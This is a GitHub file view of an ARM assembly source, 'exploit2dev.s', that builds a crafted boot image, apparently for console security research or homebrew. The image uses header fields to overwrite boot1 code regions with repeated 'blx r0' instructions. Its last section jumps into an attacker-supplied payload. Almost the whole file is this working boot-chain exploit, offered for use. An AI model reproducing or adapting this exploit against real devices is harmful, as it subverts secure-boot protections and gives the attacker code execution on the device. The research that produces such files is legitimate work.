-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathexploit2dev.s
More file actions
71 lines (71 loc) · 3.33 KB
/
exploit2dev.s
File metadata and controls
71 lines (71 loc) · 3.33 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
.arm.big
.create "exploit2dev.bin", 0
.incbin "header.ancast"
.align 0x80000
; Toucan image header
.word 0xfd9b5b7a ; magic
.word 3 ; section count
.word 0x01808000, 0x01808800 ; some space in Napa to clobber
.word 0 ; flags
.word 0 ; syscfg1 (unused as flag for that is unset)
.word 0, 0 ; unused
; Section headers
.word 0x0d400700 ; address of code to overwrite in boot1 based at 0x0d400000
.word section1end-section1 ; size
.word 0x08000500 ; address of code to overwrite in boot1 based at 0x08000000
.word section2end-section2 ; size
.word 0 ; address of payload
.word section3end-section3 ; size
.align 0x20
; Section data
.thumb
section1:
; Overwrite 0x100 bytes with blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
section1end:
.align 0x20
section2:
; Overwrite 0x100 bytes with blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0 :: blx r0
section2end:
.align 0x20
section3:
.thumb
ldr r0, =0x01000200
ldr r1, [r0] ; load HdrSize
add r0, r0, r1 ; r0 = ancast body + HdrSize
blx r0 ; jump
.pool
section3end:
.align 0x10000
.close